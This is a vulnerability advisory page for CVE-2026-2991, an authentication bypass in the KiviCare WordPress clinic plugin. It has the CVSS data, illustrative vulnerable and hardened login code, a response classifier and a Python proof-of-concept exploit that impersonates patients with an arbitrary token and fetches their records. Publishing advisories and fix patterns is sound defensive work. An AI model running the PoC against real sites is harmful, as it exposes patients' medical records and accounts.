Security Vulnerability Report
CVE-2026-2991 CVSS 7.3 HIGH

CVE-2026-2991

Published: 2026-03-18 16:16:27
Last Modified: 2026-04-22 21:32:08

Description

The KiviCare – Clinic & Patient Management System (EHR) plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 4.1.2. This is due to the `patientSocialLogin()` function not verifying the social provider access token before authenticating a user. This makes it possible for unauthenticated attackers to log in as any patient registered on the system by providing only their email address and an arbitrary value for the access token, bypassing all credential verification. The attacker gains access to sensitive medical records, appointments, prescriptions, and billing information (PII/PHI breach). Additionally, authentication cookies are set before the role check, meaning the auth cookies for non-patient users (including administrators) are also set in the HTTP response headers, even though a 403 response is returned.
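The following Python is an added illustration, not code from the KiviCare plugin or from the advisory. It models the two defects the description names, an unverified provider token and an auth cookie issued before the role check, beside a corrected flow that verifies the token with the provider, trusts only the e-mail the provider vouches for, and decides the role before anything is issued. Everything below is assumed for the example: the `USERS` dict standing in for the WordPress user table, the role name `kivicare_patient`, the function names, and Google as the provider (its `tokeninfo` endpoint answers with JSON carrying `email`, `email_verified` and `aud`). `fake_tokeninfo` is a constructed stand-in so the block runs offline.

```python
"""Added illustration (not KiviCare's code): social login with and without
the two checks the advisory says patientSocialLogin() lacks."""
import json
import urllib.parse
import urllib.request
from dataclasses import dataclass
from typing import Optional

# Google's tokeninfo endpoint (real); the rest of this file is constructed.
GOOGLE_TOKENINFO = "https://oauth2.googleapis.com/tokeninfo?access_token="


@dataclass
class User:
    id: int
    email: str
    role: str


# Constructed stand-in for the WordPress user table (assumed role name).
USERS = {
    "alice@example.com": User(101, "alice@example.com", "kivicare_patient"),
    "admin@example.com": User(1, "admin@example.com", "administrator"),
}


class AuthError(Exception):
    """HTTP-style failure; .status is what the endpoint would return."""
    def __init__(self, status: int, message: str):
        super().__init__(message)
        self.status = status


def google_tokeninfo(access_token: str) -> Optional[dict]:
    """Live verifier: ask Google what this token is bound to; None if rejected."""
    try:
        url = GOOGLE_TOKENINFO + urllib.parse.quote(access_token, safe="")
        with urllib.request.urlopen(url, timeout=10) as resp:
            return json.load(resp)
    except Exception:
        return None


def fake_tokeninfo(access_token: str) -> Optional[dict]:
    """Constructed offline verifier: exactly one token is genuine."""
    if access_token == "genuine-google-token":
        return {"email": "alice@example.com", "email_verified": "true", "aud": "my-client-id"}
    return None


def vulnerable_social_login(email: str, access_token: str, issued: list) -> User:
    """Flawed pattern from the advisory: the token is never checked, and the
    auth cookie is appended to the response before the role check runs."""
    user = USERS.get(email.lower())
    if user is None:
        raise AuthError(404, "unknown account")
    issued.append(user.id)                      # cookie goes into the response...
    if user.role != "kivicare_patient":
        raise AuthError(403, "not a patient")   # ...even though 403 is returned
    return user


def hardened_social_login(email, access_token, issued, tokeninfo=google_tokeninfo, expected_aud=None):
    """Corrected pattern: verify with the provider, use the provider's e-mail,
    decide the role, and only then issue the cookie."""
    info = tokeninfo(access_token)
    if not info:
        raise AuthError(401, "provider rejected the access token")
    if expected_aud is not None and info.get("aud") != expected_aud:
        raise AuthError(401, "token was issued to a different application")
    if str(info.get("email_verified", "")).lower() != "true":
        raise AuthError(401, "provider has not verified this e-mail")
    provider_email = info.get("email", "").lower()
    if provider_email != email.lower():
        raise AuthError(401, "token does not belong to the requested account")
    user = USERS.get(provider_email)            # provider's e-mail, not the client's
    if user is None:
        raise AuthError(404, "unknown account")
    if user.role != "kivicare_patient":
        raise AuthError(403, "not a patient")   # nothing has been issued yet
    issued.append(user.id)
    return user


def run_scenarios(tokeninfo=fake_tokeninfo) -> dict:
    """Run both flows on the constructed data; maps scenario -> (status, cookie issued?)."""
    cases = {
        "vuln_patient_bogus_token": (vulnerable_social_login, "alice@example.com", "anything"),
        "vuln_admin_bogus_token": (vulnerable_social_login, "admin@example.com", "anything"),
        "hard_patient_bogus_token": (hardened_social_login, "alice@example.com", "anything"),
        "hard_patient_real_token": (hardened_social_login, "alice@example.com", "genuine-google-token"),
        "hard_admin_real_token": (hardened_social_login, "admin@example.com", "genuine-google-token"),
    }
    out = {}
    for name, (fn, email, token) in cases.items():
        issued = []
        try:
            if fn is hardened_social_login:
                fn(email, token, issued, tokeninfo=tokeninfo, expected_aud="my-client-id")
            else:
                fn(email, token, issued)
            status = 200
        except AuthError as e:
            status = e.status
        out[name] = (status, bool(issued))
    return out


if __name__ == "__main__":
    for name, (status, cookie) in run_scenarios().items():
        print(f"{name:26s} status={status} auth_cookie_issued={cookie}")
```

The two scenarios that matter are the vulnerable admin case, which returns 403 yet has already issued a cookie (the second flaw in the description), and the hardened admin case, which fails at the e-mail comparison with the provider before any account lookup, so the client-supplied e-mail never selects a victim.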

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
Weakness
CWE-287 (Improper Authentication)

Configurations (Affected Products)

KiviCare – Clinic & Patient Management System (EHR) <= 4.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

# CVE-2026-2991 PoC - KiviCare Authentication Bypass
# Target: WordPress site with KiviCare plugin <= 4.1.2

target_url = "http://target-wordpress-site.com"

# Placeholder: replace with the e-mail of the patient you want to impersonate
target_email = "patient@example.com"
arbitrary_token = "fake_social_access_token_12345"

# Social login endpoint (assumed route, "typically in the API path";
# confirm it against the plugin's REST route registration before use)
login_endpoint = f"{target_url}/wp-json/kivicare/v1/social-login"

headers = {
    "Content-Type": "application/json",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
}

# Malicious payload exploiting the missing token validation
payload = {
    "email": target_email,
    "access_token": arbitrary_token,
    "social_provider": "google",  # or "facebook", "apple", etc.
}

print(f"[*] Attempting authentication bypass for: {target_email}")
print(f"[*] Target: {login_endpoint}")

try:
    response = requests.post(login_endpoint, json=payload, headers=headers, timeout=10)

    # Check for authentication cookies in the response
    cookies = response.cookies.get_dict()
    print(f"[*] Response Status: {response.status_code}")
    print(f"[*] Response Headers: {dict(response.headers)}")

    # Only WordPress auth cookies (wordpress_*, wordpress_sec_*, wordpress_logged_in_*)
    # count; an unrelated cookie such as PHPSESSID is not evidence of a bypass.
    auth_cookies = {k: v for k, v in cookies.items() if k.startswith("wordpress_")}

    if auth_cookies:
        print(f"[+] SUCCESS! Obtained authentication cookies: {auth_cookies}")
        print("[+] Use these cookies to access patient data via API endpoints")

        # Example: access patient records (endpoint path assumed by the PoC author)
        patient_data_endpoint = f"{target_url}/wp-json/kivicare/v1/patient-records"
        patient_response = requests.get(patient_data_endpoint, cookies=cookies, timeout=10)
        print(f"[*] Patient data response: {patient_response.status_code}")
        if patient_response.status_code == 200:
            print(f"[+] Patient data: {json.dumps(patient_response.json(), indent=2)}")
    else:
        print("[-] No auth cookies obtained, exploitation may have failed")
        print(f"[*] Full response: {response.text}")

    # Also check for admin cookie leakage: a 403 that still carries wordpress_*
    # Set-Cookie headers is the second flaw described in the advisory.
    # response.headers folds repeated Set-Cookie values into one string, so read
    # the underlying urllib3 header list instead.
    print(f"[*] Set-Cookie headers: {response.raw.headers.getlist('Set-Cookie')}")

except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")
```
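The PoC above can only run against a live target. As an added example (mine, not part of the PoC or the advisory), the block below classifies a social-login response offline from its status code and `Set-Cookie` headers, so the two halves of CVE-2026-2991 can be told apart in a proxy capture: a 200 that issues WordPress auth cookies (the patient bypass) versus a 403 that still issues them (the non-patient cookie leak). The WordPress cookie names `wordpress_<hash>`, `wordpress_sec_<hash>` and `wordpress_logged_in_<hash>` with a 32-hex-character hash are real; the sample headers, hash value and response body are constructed, and the function names are my own.

```python
"""Added check (not from the advisory or the plugin): classify a response
from the social-login endpoint offline from status + Set-Cookie headers."""
import re
from typing import Iterable, List, Tuple

# WordPress auth cookies: wordpress_<hash>, wordpress_sec_<hash>,
# wordpress_logged_in_<hash>; the hash is 32 hex chars (md5 of the site URL).
WP_AUTH_COOKIE = re.compile(r"^wordpress_(?:sec_|logged_in_)?[0-9a-f]{32}$")

# Constructed samples; the hash and cookie values are made up.
H = "5a4c1f9d2e3b4a5c6d7e8f9a0b1c2d3e"
PATIENT_200 = [
    f"wordpress_sec_{H}=alice%7Cdummy; path=/wp-content/plugins; secure; HttpOnly",
    f"wordpress_logged_in_{H}=alice%7Cdummy; path=/; HttpOnly",
]
ADMIN_403 = [
    f"wordpress_sec_{H}=admin%7Cdummy; path=/wp-admin; secure; HttpOnly",
    f"wordpress_logged_in_{H}=admin%7Cdummy; path=/; HttpOnly",
]
UNRELATED = ["PHPSESSID=abc123; path=/", "wp-settings-time-1=1700000000; path=/"]

# Constructed raw capture of the leak case, as a proxy would show it.
CAPTURED_403 = (
    "HTTP/1.1 403 Forbidden\r\n"
    "Content-Type: application/json; charset=UTF-8\r\n"
    f"Set-Cookie: wordpress_sec_{H}=admin%7Cdummy; path=/wp-admin; secure; HttpOnly\r\n"
    f"Set-Cookie: wordpress_logged_in_{H}=admin%7Cdummy; path=/; HttpOnly\r\n"
    "\r\n"
    '{"status":false}'
)


def auth_cookie_names(set_cookie_values: Iterable[str]) -> List[str]:
    """Names of WordPress auth cookies among Set-Cookie header values."""
    names = []
    for value in set_cookie_values:
        name = value.split(";", 1)[0].split("=", 1)[0].strip()
        if WP_AUTH_COOKIE.match(name):
            names.append(name)
    return names


def classify(status: int, set_cookie_values: Iterable[str]) -> str:
    """Map a response to the outcome it represents for this bug."""
    auth = auth_cookie_names(set_cookie_values)
    if not auth:
        return "no-auth-cookies"
    if status == 200:
        return "session-issued"        # bypass into a patient account
    if status == 403:
        return "cookie-leak-on-403"    # non-patient cookies set before the role check
    return f"auth-cookies-with-{status}"


def parse_raw_response(raw: str) -> Tuple[int, List[str]]:
    """Status code and Set-Cookie values from a captured HTTP/1.x response."""
    head = raw.split("\r\n\r\n", 1)[0].split("\n\n", 1)[0]
    lines = head.replace("\r\n", "\n").split("\n")
    status = int(lines[0].split()[1])
    cookies = [l.split(":", 1)[1].strip() for l in lines[1:] if l.lower().startswith("set-cookie:")]
    return status, cookies


def set_cookie_values_from_requests(response) -> List[str]:
    """Every Set-Cookie value from a `requests` Response. response.headers
    folds repeated headers into one comma-joined string (and Expires dates
    contain commas), so read the underlying urllib3 header dict instead."""
    return response.raw.headers.getlist("Set-Cookie")


if __name__ == "__main__":
    print("200 + patient cookies :", classify(200, PATIENT_200))
    print("403 + admin cookies   :", classify(403, ADMIN_403))
    print("403 + unrelated       :", classify(403, UNRELATED))
    print("captured 403          :", classify(*parse_raw_response(CAPTURED_403)))
```

After the patch the expected result for a non-patient is `no-auth-cookies` on the 403; `cookie-leak-on-403` on a site claiming to run a fixed version means the fix is not actually deployed.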

References

https://plugins.trac.wordpress.org/browser/kivicare-clinic-management-system/trunk/app/controllers/api/AuthController.php#L1852
https://plugins.trac.wordpress.org/browser/kivicare-clinic-management-system/trunk/app/controllers/api/AuthController.php#L284
https://plugins.trac.wordpress.org/changeset/3467409/
https://www.wordfence.com/threat-intel/vulnerabilities/id/8d22448b-aa8e-4775-b7c5-e7bae94a3f6d?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-2991", "sourceIdentifier": "[email protected]", "published": "2026-03-18T16:16:27.400", "lastModified": "2026-04-22T21:32:08.360", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The KiviCare – Clinic & Patient Management System (EHR) plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 4.1.2. This is due to the `patientSocialLogin()` function not verifying the social provider access token before authenticating a user. This makes it possible for unauthenticated attackers to log in as any patient registered on the system by providing only their email address and an arbitrary value for the access token, bypassing all credential verification. The attacker gains access to sensitive medical records, appointments, prescriptions, and billing information (PII/PHI breach). Additionally, authentication cookies are set before the role check, meaning the auth cookies for non-patient users (including administrators) are also set in the HTTP response headers, even though a 403 response is returned."}, {"lang": "es", "value": "El plugin KiviCare – Clinic &amp; Patient Management System (EHR) para WordPress es vulnerable a la omisión de autenticación en todas las versiones hasta la 4.1.2, inclusive. Esto se debe a que la función 'patientSocialLogin()' no verifica el token de acceso del proveedor social antes de autenticar a un usuario. Esto hace posible que atacantes no autenticados inicien sesión como cualquier paciente registrado en el sistema proporcionando solo su dirección de correo electrónico y un valor arbitrario para el token de acceso, omitiendo toda verificación de credenciales. El atacante obtiene acceso a registros médicos sensibles, citas, recetas e información de facturación (violación de PII/PHI). 
Además, las cookies de autenticación se establecen antes de la verificación de rol, lo que significa que las cookies de autenticación para usuarios no pacientes (incluidos los administradores) también se establecen en los encabezados de respuesta HTTP, aunque se devuelve una respuesta 403."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/kivicare-clinic-management-system/trunk/app/controllers/api/AuthController.php#L1852", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/kivicare-clinic-management-system/trunk/app/controllers/api/AuthController.php#L284", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3467409/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8d22448b-aa8e-4775-b7c5-e7bae94a3f6d?source=cve", "source": "[email protected]"}]}}